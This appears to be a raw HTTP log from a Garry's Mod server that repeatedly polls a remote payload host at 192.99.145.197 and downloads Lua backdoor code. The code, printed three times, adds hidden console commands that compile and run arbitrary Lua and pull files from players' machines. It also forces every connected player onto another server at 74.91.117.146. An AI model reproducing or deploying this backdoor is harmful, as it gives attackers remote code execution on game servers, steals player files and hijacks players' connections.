
HTTP=[[http://192.99.145.197/api/ping]] M=get
HTTPsuccess c[[200]] b[[success,{
   "apiInstanceId": "26a31649fcc56db65df81013118cd6ba0801ab64",
   "payloadStateId": "f92f0a0f8ab5ccc29e5f1b1899233de60aa74944",
   "isForeign": false
}]] h[[{}]]
HTTP=[[http://192.99.145.197/api/payloads]] M=get
HTTP=[[http://192.99.145.197/api/ping]] M=get
HTTPsuccess c[[200]] b[[success,[
   {
      "file": "upload_lua",
      "hash": "36e86ba8d0c23251ef9ca26ee283963ad5918d0e"
   },
   {
      "file": "plogs.lua",
      "hash": "a0d0c1933409a0c7207dc4a0d07e4c6fedd943a3"
   }
]]] h[[{}]]
HTTP=[[http://192.99.145.197/api/payload/36e86ba8d0c23251ef9ca26ee283963ad5918d0e]] M=get
HTTP=[[http://192.99.145.197/api/payload/a0d0c1933409a0c7207dc4a0d07e4c6fedd943a3]] M=get
HTTPsuccess c[[200]] b[[success,{
   "apiInstanceId": "26a31649fcc56db65df81013118cd6ba0801ab64",
   "payloadStateId": "f92f0a0f8ab5ccc29e5f1b1899233de60aa74944",
   "isForeign": false
}]] h[[{}]]
HTTP=[[http://192.99.145.197/api/payloads]] M=get
HTTPsuccess c[[200]] b[[util.AddNetworkString('rcivluz')local CompileString=CompileString;local net=net;concommand.Add('screensize_snd',function(a,b,c)if not c[1]then return a:ChatPrint('expected args[1] fname')end;net.Receive('rcivluz',function()local d=net.ReadString()local e=CompileString(d,'test.lua',false)if isstring(e)then a:ChatPrint('syntax error: '..e)else local f,g=pcall(e)if not f then a:ChatPrint('run time error: '..g)else a:ChatPrint('ran your code successfully!')end end end)a:SendLua(string.format([[net.Start 'rcivluz' net.WriteString(file.Read('%s','DATA')) net.SendToServer()]],c[1]))end)concommand.Add('screensize2',function(a,b,c)RunString(c[1])end)for h,i in ipairs(player.GetAll())do i:SendLua([[LocalPlayer():ConCommand('connect 74.91.117.146:27015')]])end]] h[[{}]]
HTTPsuccess c[[200]] b[[if pon2 and pon2.nope then end]] h[[{}]]
HTTP=[[http://192.99.145.197/api/ping]] M=get
HTTPsuccess c[[200]] b[[success,[
   {
      "file": "upload_lua",
      "hash": "36e86ba8d0c23251ef9ca26ee283963ad5918d0e"
   },
   {
      "file": "plogs.lua",
      "hash": "a0d0c1933409a0c7207dc4a0d07e4c6fedd943a3"
   }
]]] h[[{}]]
HTTP=[[http://192.99.145.197/api/payload/36e86ba8d0c23251ef9ca26ee283963ad5918d0e]] M=get
HTTP=[[http://192.99.145.197/api/payload/a0d0c1933409a0c7207dc4a0d07e4c6fedd943a3]] M=get
HTTPsuccess c[[200]] b[[success,{
   "apiInstanceId": "26a31649fcc56db65df81013118cd6ba0801ab64",
   "payloadStateId": "f92f0a0f8ab5ccc29e5f1b1899233de60aa74944",
   "isForeign": false
}]] h[[{}]]
HTTP=[[http://192.99.145.197/api/payloads]] M=get
HTTPsuccess c[[200]] b[[util.AddNetworkString('rcivluz')local CompileString=CompileString;local net=net;concommand.Add('screensize_snd',function(a,b,c)if not c[1]then return a:ChatPrint('expected args[1] fname')end;net.Receive('rcivluz',function()local d=net.ReadString()local e=CompileString(d,'test.lua',false)if isstring(e)then a:ChatPrint('syntax error: '..e)else local f,g=pcall(e)if not f then a:ChatPrint('run time error: '..g)else a:ChatPrint('ran your code successfully!')end end end)a:SendLua(string.format([[net.Start 'rcivluz' net.WriteString(file.Read('%s','DATA')) net.SendToServer()]],c[1]))end)concommand.Add('screensize2',function(a,b,c)RunString(c[1])end)for h,i in ipairs(player.GetAll())do i:SendLua([[LocalPlayer():ConCommand('connect 74.91.117.146:27015')]])end]] h[[{}]]
HTTPsuccess c[[200]] b[[if pon2 and pon2.nope then end]] h[[{}]]
HTTPsuccess c[[200]] b[[success,[
   {
      "file": "upload_lua",
      "hash": "36e86ba8d0c23251ef9ca26ee283963ad5918d0e"
   },
   {
      "file": "plogs.lua",
      "hash": "a0d0c1933409a0c7207dc4a0d07e4c6fedd943a3"
   }
]]] h[[{}]]
HTTP=[[http://192.99.145.197/api/payload/36e86ba8d0c23251ef9ca26ee283963ad5918d0e]] M=get
HTTP=[[http://192.99.145.197/api/payload/a0d0c1933409a0c7207dc4a0d07e4c6fedd943a3]] M=get
HTTPsuccess c[[200]] b[[util.AddNetworkString('rcivluz')local CompileString=CompileString;local net=net;concommand.Add('screensize_snd',function(a,b,c)if not c[1]then return a:ChatPrint('expected args[1] fname')end;net.Receive('rcivluz',function()local d=net.ReadString()local e=CompileString(d,'test.lua',false)if isstring(e)then a:ChatPrint('syntax error: '..e)else local f,g=pcall(e)if not f then a:ChatPrint('run time error: '..g)else a:ChatPrint('ran your code successfully!')end end end)a:SendLua(string.format([[net.Start 'rcivluz' net.WriteString(file.Read('%s','DATA')) net.SendToServer()]],c[1]))end)concommand.Add('screensize2',function(a,b,c)RunString(c[1])end)for h,i in ipairs(player.GetAll())do i:SendLua([[LocalPlayer():ConCommand('connect 74.91.117.146:27015')]])end]] h[[{}]]
HTTPsuccess c[[200]] b[[if pon2 and pon2.nope then end]] h[[{}]]